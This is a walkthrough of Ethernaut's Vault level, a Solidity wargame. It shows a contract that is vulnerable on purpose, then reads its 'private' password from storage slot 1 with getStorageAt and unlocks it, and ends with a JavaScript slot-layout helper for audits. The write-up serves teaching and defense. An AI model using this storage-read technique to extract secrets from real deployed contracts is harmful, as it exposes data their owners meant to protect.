This is level 8 of the Ethernaut game.
Pre-requisites
- Layout of state variables in Solidity
- Reading storage at a slot in contract
Hack
Given contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
    bool public locked;
    bytes32 private password;

    constructor(bytes32 _password) public {
        locked = true;
        password = _password;
    }

    function unlock(bytes32 _password) public {
        if (password == _password) {
            locked = false;
        }
    }
}
The player has to set locked to false.
The only way is to call unlock with the correct password.
Although the password state variable is private, anyone can still read a storage variable by determining its storage slot. Therefore sensitive information should not be stored on-chain, even if it is declared private.
Above, locked is a bool and occupies slot 0. password is a bytes32, which needs a full 32-byte slot, so it is at storage slot 1 in Vault.
Let's read it:
password = await web3.eth.getStorageAt(contract.address, 1)
Call unlock with password:
await contract.unlock(password)
Unlocked. Verify by:
await contract.locked() === false
And that's it.
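The slot number used above follows from Solidity's storage layout rules for state variables. As an added example (not code from the original post), this JavaScript code assigns slots to fixed-size value types in declaration order, going beyond Vault's two variables to show packing; the names sizeOf, layout and readableSlots are hypothetical, and dynamic types, structs and inherited variables are not handled.

```javascript
// Added example: slot assignment for fixed-size value types. Variables are laid out
// in declaration order; one that does not fit in the rest of the current 32-byte slot starts a new slot.
const SLOT_BYTES = 32;

// Size in bytes of a fixed-size value type (arrays, mappings, structs, strings are out of scope).
function sizeOf(type) {
  if (type === "bool") return 1;
  if (type === "address") return 20;
  let m = /^u?int(\d+)?$/.exec(type);
  if (m) return (m[1] ? Number(m[1]) : 256) / 8; // plain uint/int means 256 bits
  m = /^bytes(\d+)$/.exec(type);
  if (m && Number(m[1]) >= 1 && Number(m[1]) <= 32) return Number(m[1]);
  throw new Error(`unsupported type: ${type}`);
}

// vars: [{ name, type, visibility }] in declaration order.
function layout(vars) {
  let slot = 0;
  let offset = 0; // bytes already used in the current slot
  return vars.map((v) => {
    const size = sizeOf(v.type);
    if (offset + size > SLOT_BYTES) {
      slot += 1;
      offset = 0;
    }
    const entry = { ...v, slot, offset, size };
    offset += size;
    return entry;
  });
}

// Vault's state variables, as declared in the contract above.
const vault = layout([
  { name: "locked", type: "bool", visibility: "public" },
  { name: "password", type: "bytes32", visibility: "private" },
]);

// Audit view: every variable gets a slot that getStorageAt can read, whatever its visibility.
function readableSlots(entries) {
  return entries.map((e) => `${e.name} (${e.visibility}): slot ${e.slot}, offset ${e.offset}`);
}

console.log(readableSlots(vault).join("\n"));
```

Running the same function over a contract's declared variables during review shows which slots hold values marked private, all of which are readable by anyone with node access.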